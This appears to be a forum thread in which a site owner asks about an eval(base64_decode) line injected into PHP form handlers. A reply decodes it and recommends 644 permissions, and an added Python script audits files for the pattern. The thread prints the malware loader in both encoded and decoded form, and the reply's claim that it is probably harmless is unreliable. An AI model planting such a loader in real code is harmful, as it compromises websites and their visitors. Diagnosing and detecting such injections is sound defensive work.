I have 5 annual archery tournament events that I use forms created here for registration online, has worked for 4 or 5 years, up through Jan & Feb. 2010. Now the forms go as usual and display the confirmation page, but no emails get sent. My ISP tech support did notice that the processor.php file had been hacked with this:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lMy9yb25jYXJtaS9wdWJsaWNfaHRtbC90ZXhhc2FyY2hlcnkvQmVpamluZ01hdGNocGxheS9BcmNoZXJ5VmVudWUvQmFpbGV5UGVtYmVydG9uL3RodW1icy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
I removed that code, but still cannot get the processor.php to send emails. arghhhh.
First, whut the heck was the inserted code doing, and after removing it from the processor.php file, is this possibly why I still cannot get emails to go out upon submit of the form? IOW, did it break something else?
Second, HOW the heck did someone insert this code? I checked the four other processor.php files (one for each archery tournament registration instance) and only some of the files had been altered, not all.
Third, how do I prevent anyone from hacking this file again?
I've been down for a week and this is really crunch time for me - I have to get this working asap for a tourney next month and I can't figure out why it suddenly doesn't work now, when it did just a month or two back…
The registration form can be seen at http://texasarchery.org/Registrations/10/Field/form.html
My ISP did do some kind of upgrades recently, forced everyone to go to much more aggressive passwords for accounts. May have been a clue as to how my processor.php files were compromised (no other damage anywhere on my humongous site that I can tell).
Suggestions appreciated!
First, here is the decode:
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home3/roncarmi/public_html/texasarchery/BeijingMatchplay/ArcheryVenue/BaileyPemberton/thumbs/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
It is probably not harmful, as the path to an executable is not likely to be accessible on your site or your host.
Second:
If you set permissions to 777 or 666 then anyone can modify this file.
Third:
PHP files should only need to have read permissions on a live site. They would need write permissions for you in order for you to modify the file if and when necessary.
Change PHP file permissions to 644 or 664.
Last, if you still need help send me an email.
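A read-only audit for the two things discussed in this thread, the `eval(base64_decode(...))` line and 666/777 permissions, as an added example that is not part of the original posts. The sample tree, its placeholder path and the function names are constructed for illustration.

```python
import base64, os, re, stat, tempfile

# Matches the injected wrapper seen in the thread: eval(base64_decode('...'))
INJECT_RE = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
# Absolute .php paths quoted inside a decoded payload (secondary files to inspect)
PATH_RE = re.compile(r"'(/[^']+\.php)'")

def audit_php_tree(root):
    """Return one finding per .php file that is injected or world-writable."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.stat(path).st_mode)
            with open(path, "rb") as fh:
                data = fh.read()
            decoded = []
            for m in INJECT_RE.finditer(data):
                try:  # decode for reading only; the payload is never executed
                    decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
                except ValueError:
                    decoded.append("<not valid base64>")
            world_writable = bool(mode & stat.S_IWOTH)  # the 666/777 case
            if decoded or world_writable:
                findings.append({
                    "file": os.path.relpath(path, root),
                    "mode": format(mode, "03o"),
                    "world_writable": world_writable,
                    "decoded": decoded,
                    "included": sorted({p for d in decoded for p in PATH_RE.findall(d)}),
                })
    return findings

def demo():
    """Build a constructed sample tree (placeholder path) and audit it."""
    stub = "if(file_exists('/home/example/thumbs/style.css.php')){include_once('/home/example/thumbs/style.css.php');}"
    injected = "<?php /**/eval(base64_decode('%s')); ?>\n<?php echo 'form'; ?>\n" % base64.b64encode(stub.encode()).decode()
    with tempfile.TemporaryDirectory() as root:
        for name, body, mode in [("a/processor.php", injected, 0o666),
                                 ("b/processor.php", "<?php echo 'form'; ?>\n", 0o644)]:
            os.makedirs(os.path.join(root, os.path.dirname(name)))
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
            os.chmod(os.path.join(root, name), mode)
        return audit_php_tree(root)
```

Any path listed under `included` is a second file that the injected line loads, so it needs the same inspection as the file that was flagged.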
Hi - thank you - I have that working now. I checked the permissions via chmod and it was NOT set to 644, so I have fixed that.
So that code simply pointed to another location on my server, where I have a folder full of photos created through JAlbum.
I think my ISP heightened their security systems and once they did something on their end, things seemed to start behaving normally.
My thanks!